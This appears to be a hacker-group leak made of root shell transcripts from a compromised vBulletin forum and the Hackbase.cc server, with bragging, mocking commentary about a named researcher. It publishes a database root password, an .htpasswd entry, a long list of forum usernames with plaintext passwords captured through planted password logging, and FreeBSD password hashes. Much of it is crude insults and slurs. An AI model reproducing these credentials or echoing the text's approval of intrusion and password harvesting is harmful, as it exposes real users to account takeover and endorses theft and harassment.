-rw-r--r-- 1 root root 3657 Sep 24 11:16 blog_attachment.php
-rw-r--r-- 1 root root 96572 Sep 24 11:16 calendar.php
-rw-r--r-- 1 root root 3336 Sep 24 11:16 ckeditor.php
-rw-r--r-- 1 root root 43 Sep 24 11:16 clear.gif
drwxr-xr-x 11 root root 4096 Oct 1 15:09 clientscript
-rw-r--r-- 1 root root 15382 Sep 24 11:16 converse.php
drwxr-xr-x 7 root root 4096 Oct 1 15:09 cpstyles
-rw-r--r-- 1 root root 3263 Sep 24 11:16 cron.php
-rw-r--r-- 1 root root 6206 Sep 24 11:16 css.php
drwxrwxrwx 3 root root 36864 Oct 2 10:09 customavatars
drwxr-xr-x 3 root root 4096 Oct 1 15:09 customgroupicons
drwxrwxrwx 2 root root 20480 Oct 2 07:58 customprofilepics
-rw-r--r-- 1 root root 1739 Sep 24 11:16 editor.php
-rw-r--r-- 1 root root 47262 Sep 24 11:16 editpost.php
-rw-r--r-- 1 root root 1355 Sep 24 11:16 entry.php
-rw-r--r-- 1 root root 30313 Sep 24 11:16 external.php
-rw-r--r-- 1 root root 9920 Sep 24 11:16 faq.php
-rw-r--r-- 1 root root 10134 Sep 24 11:16 favicon.ico
-rw-r--r-- 1 root root 22480 Sep 24 11:16 forum.php
-rw-r--r-- 1 root root 43139 Sep 24 11:16 forumdisplay.php
-rw-r--r-- 1 root root 2025 Sep 24 11:16 global.php
-rw-r--r-- 1 root root 152626 Sep 24 11:16 group.php
-rw-r--r-- 1 root root 26181 Sep 24 11:16 group_inlinemod.php
-rw-r--r-- 1 root root 11362 Sep 24 11:16 groupsubscription.php
-rw-r--r-- 1 root root 9016 Sep 24 11:16 image.php
drwxr-xr-x 26 root root 4096 Oct 1 15:10 images
drwxr-xr-x 9 root root 12288 Oct 1 19:34 includes
-rw-r--r-- 1 root root 114 Oct 2 05:57 index.php
-rw-r--r-- 1 root root 47257 Sep 24 11:16 infraction.php
-rw-r--r-- 1 root root 187319 Sep 24 11:17 inlinemod.php
-rw-r--r-- 1 root root 6831 May 14 02:43 itrader.php
-rw-r--r-- 1 root root 15395 Aug 25 15:30 itrader_detail.php
-rw-r--r-- 1 root root 12933 Aug 25 14:14 itrader_feedback.php
-rw-r--r-- 1 root root 1405 Apr 21 03:45 itrader_global.php
-rw-r--r-- 1 root root 23116 Aug 25 17:15 itrader_main.php
-rw-r--r-- 1 root root 3970 Apr 21 03:45 itrader_report.php
-rw-r--r-- 1 root root 1779 Aug 6 06:47 jabber.php
-rw-r--r-- 1 root root 11697 Sep 24 11:16 joinrequests.php
-rw-r--r-- 1 root root 1675 Sep 24 11:17 list.php
-rw-r--r-- 1 root root 11055 Sep 24 11:17 login.php
-rw-r--r-- 1 root root 30872 Sep 24 11:17 member.php
-rw-r--r-- 1 root root 16346 Sep 24 11:17 member_inlinemod.php
-rw-r--r-- 1 root root 40089 Sep 24 11:17 memberlist.php
drwxr-xr-x 6 root root 4096 Oct 1 15:10 mgc_cb_evo
-rw-r--r-- 1 root root 60012 May 17 2010 mgc_cb_evo.php
-rw-r--r-- 1 root root 49969 Sep 25 13:43 mgc_cb_evo_ajax.php
-rw-r--r-- 1 root root 22218 Sep 24 11:17 misc.php
-rw-r--r-- 1 root root 5866 Sep 24 11:17 mobile.php
-rw-r--r-- 1 root root 76344 Sep 24 11:17 moderation.php
-rw-r--r-- 1 root root 6733 Sep 24 11:17 moderator.php
-rw-r--r-- 1 root root 17516 Sep 24 11:17 newattachment.php
-rw-r--r-- 1 root root 41424 Sep 24 11:17 newreply.php
-rw-r--r-- 1 root root 20622 Sep 24 11:17 newthread.php
-rw-r--r-- 1 root root 21562 Sep 24 11:17 online.php
drwxr-xr-x 7 root root 4096 Oct 1 15:10 packages
-rw-r--r-- 1 root root 8526 Sep 24 11:17 payment_gateway.php
-rw-r--r-- 1 root root 13314 Sep 24 11:17 payments.php
-rw-r--r-- 1 root root 4016 Sep 24 11:17 picture.php
-rw-r--r-- 1 root root 16619 Sep 24 11:17 picture_inlinemod.php
-rw-r--r-- 1 root root 26550 Sep 24 11:17 picturecomment.php
-rw-r--r-- 1 root root 29311 Sep 24 11:17 poll.php
-rw-r--r-- 1 root root 10318 Sep 24 11:17 posthistory.php
-rw-r--r-- 1 root root 76497 Sep 24 11:17 postings.php
-rw-r--r-- 1 root root 7037 Sep 24 11:17 printthread.php
-rw-r--r-- 1 root root 81357 Sep 24 11:17 private.php
-rw-r--r-- 1 root root 163788 Sep 24 11:17 profile.php
-rw-r--r-- 1 root root 56552 Sep 24 11:17 register.php
-rw-r--r-- 1 root root 7248 Sep 24 11:17 report.php
-rw-r--r-- 1 root root 14719 Sep 24 11:17 reputation.php
-rw-r--r-- 1 root root 127 Sep 26 02:58 rules.php
-rw-r--r-- 1 root root 35091 Sep 24 11:17 search.php
-rw-r--r-- 1 root root 22872 Sep 24 11:17 sendmessage.php
-rw-r--r-- 1 root root 12879 Sep 24 11:17 showgroups.php
-rw-r--r-- 1 root root 12806 Sep 24 11:17 showpost.php
-rw-r--r-- 1 root root 82207 Sep 24 11:17 showthread.php
drwxrwxrwx 2 root root 4096 Oct 1 17:57 signaturepics
drwxr-xr-x 2 root root 4096 Oct 1 15:10 store_sitemap
-rw-r--r-- 1 root root 39241 Sep 24 11:17 subscription.php
-rw-r--r-- 1 root root 5353 Sep 24 11:17 tags.php
-rw-r--r-- 1 root root 8754 Sep 24 11:17 threadrate.php
-rw-r--r-- 1 root root 11104 Sep 24 11:17 threadtag.php
-rw-r--r-- 1 root root 61 Sep 24 11:17 uploadprogress.gif
-rw-r--r-- 1 root root 39671 Sep 24 11:17 usercp.php
-rw-r--r-- 1 root root 21703 Sep 24 11:17 usernote.php
drwxr-xr-x 13 root root 4096 Oct 1 15:10 vb
-rw-r--r-- 1 root root 28505 Sep 24 11:17 visitormessage.php
-rw-r--r-- 1 root root 126 Jul 10 18:23 vv.php
-rw-r--r-- 1 root root 1679 Sep 24 11:17 widget.php
-rw-r--r-- 1 root root 3801 Sep 24 11:17 xmlsitemap.php
drwxr-xr-x 3 root root 4096 Oct 1 15:06 xxxoinbe843bSIUf4igfn49ugnsdkmngwei9fu
drwxr-xr-x 2 root root 4096 Oct 1 15:10 zzzsf84bfsadifubSIDFUB48bf
# head -n75 includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ?2000-2011 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
/*-------------------------------------------------------*\
| ****** HINWEIS ZU DEN VARIABLEN IN DIESER DATEI ******* |
+---------------------------------------------------------+
| Falls bei dem Verbindungsaufbau zu Ihrer MySQL-Daten- |
| bank Fehler auftreten, muessen Sie Ihren Provider um |
| Hilfe bitten, da wir Ihnen die richtigen Daten fuer die |
| Variablen in dieser Datei nicht nennen koennen. |
\*-------------------------------------------------------*/
// ****** DATENBANK: TYP ******
// Tragen Sie hier den Typ Ihres Datenbankservers ein, auf dem sich die vBulletin-Datenbank
// befinden wird bzw. befindet. Gueltige Optionen sind mysql und mysqli.
// Versuchen Sie es mit mysqli, wenn Sie PHP 5 und MySQL 4.1+ verwenden.
// Wenn Sie eine Master-Slave Datenbankkonfiguration betreiben moechten, tragen Sie 'mysql_slave' bzw. 'mysqli_slave' ein.
$config['Database']['dbtype'] = 'mysql';
// ****** DATENBANK: NAME DER DATENBANK ******
// Tragen Sie hier den Namen der Datenbank ein, mit der vBulletin arbeiten soll.
// Diesen Datenbanknamen erhalten Sie normalerweise von Ihrem Provider.
$config['Database']['dbname'] = 'gh45t456dff';
// ****** TABELLEN-PRAEFIX ******
// Praefix, das den Tabellennamen in der Datenbank vorangestellt wird.
// Zum Beispiel: $config['Database']['tableprefix'] = 'vb_';
// Hinweis: Praefixe fuer die Tabellennamen koennen Sie mit der Datei
// install/tableprefix.php hinzufuegen, aendern oder entfernen.
$config['Database']['tableprefix'] = '';
// ****** TECHNISCHE E-MAIL-ADRESSE ******
// Treten Fehler bei der Datenbank auf, wird eine E-Mail mit einer Fehlerbeschreibung
// an diese Adresse geschickt.
// Falls Sie hier keine E-Mail-Adresse eintragen, werden bei Datenbankfehlern keine
// E-Mails verschickt.
$config['Database']['technicalemail'] = 'techmin@zion-network.net';
// ****** LEEREN SQL-MODUS ERZWINGEN ******
// In neueren Versionen von MySQL (4.1+) gibt es einige Neuerungen, die nicht mit vBulletin
// kompatibel sind. Wenn Sie diese Einstellung auf "true" setzen, werden diese Neuerungen
// deaktiviert. Sie muessen diese Einstellung nur aendern, wenn vBulletin Sie dazu auffordert.
$config['Database']['force_sql_mode'] = false;
// ****** MASTER-DATENBANK: SERVERNAME UND PORT ******
// Tragen Sie hier den Hostnamen oder die IP-Adresse und den Port Ihres Datenbankservers ein.
// Wenn Sie sich nicht sicher sind, was Sie hier eintragen muessen, versuchen Sie es zunaechst
// mit dem Standardwerten.
//
// Hinweis: Wenn Sie IIS 7+ verwenden und MySQL auf demselben Server installiert ist,
// muessen Sie '127.0.0.1' statt 'localhost' verwenden.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;
// ****** MASTER-DATENBANK: BENUTZERNAME & KENNWORT ******
// Tragen Sie hier den Benutzernamen und das Kennwort ein, die Sie fuer den Zugriff
// auf den MySQL-Server benoetigen.
// Den Benutzernamen und das Kennwort erhalten Sie von Ihrem Provider.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = 'MN1TkdPXEjsghK5Rpn6BOhgihwEGdfFFXR9aM9Mz';
// ****** MASTER-DATENBANK: PERSISTENTE VERBINDUNGEN ******
// Hier koennen Sie festlegen, ob persistente Verbindungen zu MySQL genutzt werden sollen.
// Der Performance-Unterschied ist im Normalfall vernachlaessigbar, ausser vielleicht
# ALRIGHT WE LET MYSQL RUN AS ROOT GOODJOB TECHADMIN^C
# find . -name ".ht*"
./clientscript/ckeditor/.htaccess
./includes/.htaccess
./includes/.htpasswd
# cat ./includes/.htaccess
AuthUserFile /var/www/board/includes/.htpasswd
AuthGroupFile /dev/null
AuthName "Password Protected Area"
AuthType Basic
# YES WE HAVE TO PROTECT THE include/ DIR BUT NOT THE ADMIN DIR !^C
# HOW RETARDED IS THAT?^C
# cat ./includes/.htpasswd
gfhfghgfhfh:gfQWbanquzu7U
# ...^C
Ok, we decided to build in some logging of plaintext passwords, so you
find a pretty nice list of the (important) users we got. The list
includes admins, mods, supermods, vendors, VIPs and 2nd level users.
That should offer pretty good ruquz.
$yMBI0S:!"§$symbioszion2
0nlybuziness:q53shlmj-zupf-gtxq
0th3rw1s3:sackgesicht1
2x4:4.gSi3a0GHSig,$g,$9S1$;zx,4§$Yzllm§$9S1$;za0GHSig,$g,$9S1$x,4§$Yzllm§$3a0
3gold:hHz74JJddd24
6bfbpgan:crackn1994
A. Scott:bljadskipetra1963dirk1969
Absuro:Jen9gIrf2aAq
Born2Hack:hurensohn123.
BozzPL:fajnadziwka77
Captain:affe1234
CerzZ:●●●●●●●●●●
Clive:qwertz1234
CurRy:Razyboarda3b9*
Cyber Tjak:)kn{qhaÜxkT:y*fx,C{+o@npwnGwC0j
Death:²²³;KW282jlad"§'2]249"!2
Domenic:znDomenic1337cpp
Dynamit12:q1w2e3r4
Fairtrade-Hooker:bTBfkCWVjGVrqm
Fat Joe:Dubastard!12
FerrisBueller62:bueller4321
Fl00der:ẵṷezhsfdf35e$§56$367dgdrgerz453635e$§56$gergdrg3r3
Fleischpeitsche:5Gg4Bk2kfZsUt7svQQndEVS8meAfzWgbuXReJYG7H
Gibbsi:Gibbsi17
Goa:N/(//$§??="(/$nhbfafvaosh**##jniun
HUGO:809583
Hades:hi1337
IcEmAnN:Allerdings123
IceWolfBiH:kreker2011++
Johnny:gaylordhoho
Kaho:lol1223
KiR0V:blizzart-1
Knell:novn7L8n
Kollegah der Boss:monamona
LaV!daL0ca:öpIqw;CVi,#u7#eSvF3
Lyrex:Q8vK1c16bqIt1hL5z0
Marlboro:Hammer123
Morris:Wmq4HDAn
NYD:SaskiaJahnke
Niemann:smokingteddy12
Overlord:sxyLW6WJ
P1r0x:Rofl123@
Paco:13xqextraordinary37
Platinum:c3pzhadf
Pro100DDOS:3006497852
Pro100ddos:3006497852
R3volution:beste
Rubik:getlow123
S!mspon:123abc456
Schlomo:nQLrgeLlzKU6vy_bREO5
Shroomery:82#~wmV9u-IQAdn{
Sirius.GER:rolexblingbling@2
Snowstar:8Nj6aAh5
Spike80:$$$ksmafia$$$
Spike:mareike
TEAR:fusion22#
ThunBird:gentlemangentleman
Tiberius:asdoiasjdOWK
Timmee:Ria05!Ria05
Titanium:1274HappyNinja
Vadim:eg54egh45h
Werner:ggrhaskell221abx55
ZeuS:h4x0r3000
abo:nero2311
affenarsch:123456ab
ahabye:w11h1995
alpha:bobby27
bahnticketz:LJKSfß04j_LSdjfl
bigpapa1:fickdich123
blackafgahn:jojo123
blackwater:aSd1111111111""
blond1000:sackgesicht1
bloody:4ns8ka0vzion
carlos:carlos11
chakuza:nemismortom88
comic:Weltraum?tele
congo:)"/HMJZ"BD62tfgbdNZ"
d1xxy:hd]]'']"}:}(}"4A
d3adline:hum!0hm
d3rd0n:vet31mh
dendenis:Waslosdicker2
dirtydevil:Z/&"L1ght)0d.;!=)Ficken13"(/..<>
elax:jessica
emdre:lunartec1
fair_playa77:J6Dm8hFhJ6Dm8hFh
fakedMe:eileen13
fakerboy:frankycrew12345
fallout:wazzzappsp3
flon203:flon@Nex
glow:amolacar1994+#!Asdf
hades:hi1337
hakan123:hakan
heisenb6rg:3e2w1q
homouus:lolfisch
homouus:lolfische
iks:noji987
jannizzz:lol123
johnlopez:948nF)§(J03kd09j3
kaye:kaye1234
knell:novn7L8n
krillewurm:manfred2711
krono§:1337return1337
kryptôn:123456789ss
lasdas:123456
leonard:wj0oU3QJr7pgZ
lolboter:lila123
lowbird:3mksu92k=DAK"=)213s
lucifer:3.fv!G,$7Ft/;zx,5§Y$Gh"f4tv!D§$3a%0Gy(hXH
misanthrop:vju4S4KSthdUD
miss.marpel:m4NnrxfZ6QbbyhZc
mividaloca:jmZ5rjSkjl#7Qm23+::SmqW.cY}U8c
mr. CC:Ficken1337
mr.montana:46samira46
muti:fuckthatshitinass22
n1312:JKjd(()&%hf%&g837gdf
neocrow:6/4=)6$§61%)6/=1/
nighter:Six6Pack
ooops:ichkommauskielderstadtammeer241985
paco:13xqextraordinary37
paulpanzer:159159159
pelikan:B3v8aZPS
phen:utecpnkq6512429myaccount!
prosto:16471647
ps24h:Q!ä?-sK2%8AcfÜ2.=%
purplera1n:rg5hg54gh45hg
r4nd0m:fuckyou1
rabbit:nSRXQm3G
rad0n:12345
reQ:Mesum3565me35650108e711lol
romulus:v678rheberhbeg
sani:19n4schk4tz385
sips:5hgedhtbdh
slic3menic3:DkWLjh8G
snoppy0066:pueppyi1AA
sqli~hoe:ArZt1994
st3aLth:1337!Aa
td4s:1qaz2wsx
th3p0is0n:th3p0is0nrules1337
till7:peter123
tivja:fabuge28
trixx:makemoney!
unnex:selfmode3
vendor84453:15zocker15
veryanonym:wasnhierlosman1991
vittula:oddset06
wacked2:klfGKDfksdmfoc5§io
wastl:wastl24
xK1NG:xhu12101995xier
xTonyStylesx:pol1pol2
z4pz4r4p:AzzarackAttack
zionnoob:123456
,;~;,
_/\
\ )
(\\ ())
/';;,, // |
-------========{ Hackbase.cc }========))))))))))))))=m( )_ __
| ,(.' '~/()' ' '\
We can't say much here because we would start ~ | ||( );,
repeating ourselves. But anyway, on Hackbase.cc ( ,;.)-\ / ';,
the banner says "Hacking, Carding & more". Don't \ ( \ (
ask why we owned them; the community and that || \\
banner begged for it. By now you know our moti- /_( /_(
vation, you know our goals, deal with it.
But there is something else which was a thorn in our side. It seems
that Easy Laster aka ea former admin of Free-Hack (after we owned
them), hosts his 4004-Security-Project on Hackbase's server.
4004-security-project.com was a blog on that Easy constantly posts
horribly lame exploits for all kind of webapps that nobody uses while
thinking that by publishing all this bullshit he'd actually help
people. Actually it's a known fact that he sucks all kinds of cock for
vulnerabilities to put on exploit-db, just check it out:
exploit-db.com/author/?a=2201. It's hilarious and more than obvious
that he is one of those kids that try to inject a ' into every
parameter on a website. Here is what you get.
# uname -a
FreeBSD FreeBSD 8.2-RELEASE-p3 #0: Fri Sep 30 16:23:24 MSD 2011 amd64
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
webserver:*:1000:1000:User &:/home/webserver:/sbin/nologin
secunet:*:1002:1002:User &:/home/secunet:/sbin/nologin
testsite:*:1003:1003:User &:/home/testsite:/sbin/nologin
224422:*:1004:1004:User &:/home/224422:/sbin/nologin
testserver:*:1005:1005:User &:/home/testserver:/sbin/nologin
union:*:1006:1006:User &:/home/union:/sbin/nologin
hbstream:*:1001:1001:User &:/home/hbstream:/sbin/nologin
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:$1$cyeIuWcS$dKdflWuxgGARl2fSKU8gt1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
webserver:$1$aJvdDZwW$s0ArlD0j8Mp7.TNNWHfb61:1000:1000::0:0:User &:/home/webserver:/sbin/nologin
secunet:$1$1rSKOEED$t2rUxxCrpjM2dEOLj60hn1:1002:1002::0:0:User &:/home/secunet:/sbin/nologin
testsite:$1$UbUABgoI$YtxsunrUQShX8SvMzc9Q61:1003:1003::0:0:User &:/home/testsite:/sbin/nologin
224422:$1$wnqKSLwS$6oJKVhnALXFO40nUQerrd0:1004:1004::0:0:User &:/home/224422:/sbin/nologin
testserver:$1$a8H.A2qA$XmH5GlVXWwXDbZOsdexeU.:1005:1005::0:0:User &:/home/testserver:/sbin/nologin
union:$1$UwJ9q.lU$kMqN2S5JqT/fLPgzlIAGO/:1006:1006::0:0:User &:/home/union:/sbin/nologin
hbstream:$1$MVeAfs8T$Fp2/xBRF0jIyT4DZIvqIf.:1001:1001::0:0:User &:/home/hbstream:/sbin/nologin
# pwd
/root
# ls -la
total 6292
drwxr-xr-x 4 root wheel 512 Sep 29 09:07 .
drwxr-xr-x 18 root wheel 512 Jul 1 01:53 ..
-rw------- 1 root wheel 10971 Oct 4 14:44 .bash_history
-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc
-rw------- 1 root wheel 5249 Sep 30 21:55 .history
-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login
-rw------- 1 root wheel 71 Jul 5 15:47 .lesshst
-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login
drwx------ 3 root wheel 512 Sep 29 09:07 .mc
-rw------- 1 root wheel 18 Jul 21 17:26 .mysql_history
-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile
drwx------ 2 root wheel 512 Mar 10 2010 .ssh
-rw-r--r-- 1 root wheel 0 Jul 5 15:46 ec1902
-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php
-rw-r--r-- 1 root wheel 476 Sep 2 06:37 forsirius.conf
-rw-r--r-- 1 root wheel 3150763 Feb 21 2011 ioncube_loaders_fre_8_x86-64.tar.gz
# cat .bash_history
make install clean
cd /usr/ports/devel/ZendOptimizer/
make install clean
mc -d
cd /usr/ports/
search name=eaccelerator
make search name=eaccelerator
cd /usr/ports/www/eaccelerator
make install clean
mkdir /tmp/eaccelerator
chown www /tmp/eaccelerator
chmod 0700 /tmp/eaccelerator
mc -d
cd /usr/ports/
make search name=ioncube
cd /usr/ports/devel/ioncube
make install clean
mc -d
cd /usr/ports/lang/php52-extensions/
make install clean
pkg_version -vIL=
php -v
php -m
php -v
php -m
history
php -v
mc
php -v
php -v
mc
php -m
mc
mc
pkg_info|grep ioncube
pkg_info|grep php
mc -d
ifconfig
apachectl start
mc -d
fetch http://downloads2.ioncube.com/loader_downloads/ioncube_loaders_fre_8_x86-64.tar.gz
php loader-wizard.php
rm loader-wizard.php
cd /usr/ports/devel/ioncube/
make clean
make
/usr/local/etc/rc.d/nginx start
mcedit -d /etc/rc.conf
/usr/local/etc/rc.d/nginx start
ifconfig
apachectl restart
ps ax|grep apache
ps ax|grep http
apachectl start
ps ax|grep http
cat /var/log/httpd/httpd_error.log
cat /var/log/httpd/httpd_error.log
apachectl start
ps ax|grep http
apachectl stop
apachectl start
php -v
cd /
php -v
php -v
/usr/local/etc/rc.d/nginx stop
/usr/local/etc/rc.d/apache22 restart
exit
edit /etc/rc.conf
exit
ps ax
cd /home/
ls -l
cd webserver/
ls -l
ls -l
mc
sockstat -l4
vi /etc/rc.conf
jls
mc
apachectl restart
tail -n 100 /var/log/httpd/httpd_access.log
tail -n 100 /var/log/httpd/httpd_error.log
mc
tail -n 100 /var/log/httpd/httpd_error.log
mc
tail -n 100 /var/log/httpd/httpd_error.log
ls -la /home
ls -la /home/webserver/
ls -la /home/webserver/free-hack.in/
ls -la /home/webserver/free-hack.in/msd1/
chmod -R 755 /home/webserver/
exit
mcedit /etc/my.cnf
/usr/local/etc/rc.d/mysql-server restart
exit
mc
/usr/local/etc/rc.d/mysql-server restart
mcedit /usr/local/etc/php.ini
apachectl restart
php -m
php -v
exit
passwd
exit
passwd
tail -f /var/log/httpd/httpd_access.log
top
ps ax | grpe http | wc -l
ps ax | grep http | wc -l
tail -f /var/log/httpd/httpd_access.log
top
mysql -uroot -p`cat /etc/my.passwd `
uname -a
mailq
postsuper -D ALL
postsuper -d ALL
mailq
/usr/local/etc/rc.d/mysql-server restart
mysql -uroot -p`cat /etc/my.passwd `
mc
gstat
ps auxf
ifconfig
ee /usr/local/etc/apache22/httpd.conf
ee /usr/local/etc/nginx/nginx.conf
/usr/local/etc/rc.d/apache22 restart
/usr/local/etc/rc.d/nginx restart
/usr/local/etc/rc.d/nginx stop
ifconfig
ifconfig
head /usr/local/etc/apache22/httpd.conf
ps auxf
ee /usr/local/etc/apache22/httpd.conf
/usr/local/etc/rc.d/apache22 restart
ls -la /home/freakyfreehack/
ee /usr/local/etc/apache22/httpd.conf
/usr/local/etc/rc.d/apache22 restart
ls -la /home/secunet/
tail -f /var/log/httpd/httpd_access.log
/usr/local/etc/rc.d/apache22 restart
mc
/usr/local/etc/rc.d/apache22 restart
ifconfig
mc
ps wauxf
ifconfig
tail -f /var/log/httpd/httpd_access.log | grep server
killall -9 tail
tail -100 /var/log/httpd/httpd_access.log | grep server
ps wauxf
tail -1-00 /var/log/httpd/httpd_access.log | grep server
tail -1000 /var/log/httpd/httpd_access.log | grep server
ps wauxf
history
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
/usr/local/etc/rc.d/apache22 restart
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
ps ax | grep http | wc -l
mc
apachectl restart
apachectl stop
apachectl start
top
/usr/local/etc/rc.d/apache22 restart
top
head /usr/local/etc/apache22/httpd.conf
ps wauxf
ps wauxf | gre nginx
ps wauxf | grep nginx
cd /home/
grep testsite15.w2c.ru /usr/local/etc/apache22/vhosts/*
cd /home/forsirius/testsite15.w2c.ru
ls -la
grep testsite.w2c.ru /usr/local/etc/apache22/vhosts/*
grep w2c.ru /usr/local/etc/apache22/vhosts/*
cd /home/forsirius/testsite15.w2c.ru
ls -la
ifconfig
cd ..
ls -la
cd ..
ls -la
mc
cd /home/forsirius/testsite.w2c.ru
grep w2c.ru /usr/local/etc/apache22/vhosts/*
ifconfig
cat /etc/rc.conf
cat /etc/rc.conf
ifconfig
cat /etc/rc.conf
cat /etc/rc.local
cat /etc/rc.local
cat /etc/rc.conf
cd /home/224422/
ls -[la
ls -la
cd 224422.w2c.ru/
ls -la
ls -la
cat index.php
cd inn
cd inc
ls -la
cd ..
ls -la
ls -la pwd
ls -la adm
date
ntpdate -v -b in.pool.ntp.org
ntpdate -v -b pool.ntp.org
date 0037
date
date --help
date
mc
ps ax
/usr/local/etc/rc.d/apache22 start
ps ax
ps ax
ps ax
/usr/local/etc/rc.d/apache22 restart
mc
/usr/local/etc/rc.d/apache22 restart
top
/usr/local/etc/rc.d/apache22 restart
top -S
netstat
top -S
tcpdump
exit
/usr/local/etc/rc.d/apache22 restart
exit
ps ax
exit
cat /usr/local/etc/apache22/vhosts/hackerzhub.conf
cat /usr/local/etc/apache22/vhosts/secunet.conf
history | grep php
ee /usr/local/etc/php.ini
tail -100 /var/log/httpd/httpd_access.log
grep hackbase.cc /usr/local/etc/apache22/vhosts/*
cd /home/webserver/hackbase.cc
ls -la
ee info.php
ee /usr/local/etc/php-apache.ini
/usr/local/etc/rc.d/apache22 reload
/usr/local/etc/rc.d/apache22 reload
/usr/local/etc/rc.d/apache22 restart
nslookup
nslookup
exit
# cd /home
# ls -la
total 36
drwxr-x--x 9 root wheel 512 Oct 14 00:41 .
drwxr-xr-x 18 root wheel 512 Jul 1 01:53 ..
drwxrwxr-x 4 224422 www 512 Oct 9 20:19 224422
drwxr-x--- 5 4004 www 512 Oct 8 18:55 4004
drwxr-x--- 10 hbstream www 512 Oct 9 19:37 hbstream
drwxr-x--- 5 secunet www 512 Jul 6 21:14 secunet
drwxr-x--- 3 testserver www 512 Sep 21 18:11 testserver
drwxr-x--- 3 testsite www 512 Sep 2 06:55 testsite
drwxr-xr-x 6 webserver www 512 Oct 14 00:37 webserver
# cd 224422
# ls
224422.w2c.ru temp
# ls -la
total 16
drwxrwxr-x 4 224422 www 512 Sep 18 18:05 .
drwxr-x--x 9 root wheel 512 Sep 30 10:52 ..
drwxrwx--- 4 224422 www 512 Sep 20 18:24 224422.w2c.ru
drwxrwx--- 2 224422 www 2048 Sep 20 15:04 temp
# cd 224422.w2c.ru
# ls -la
total 36
drwxrwx--- 6 224422 www 512 Oct 18 17:58 .
drwxrwxr-x 4 224422 www 512 Oct 9 20:19 ..
drwxrwxrwx 3 224422 www 1024 Sep 18 17:26 Checker
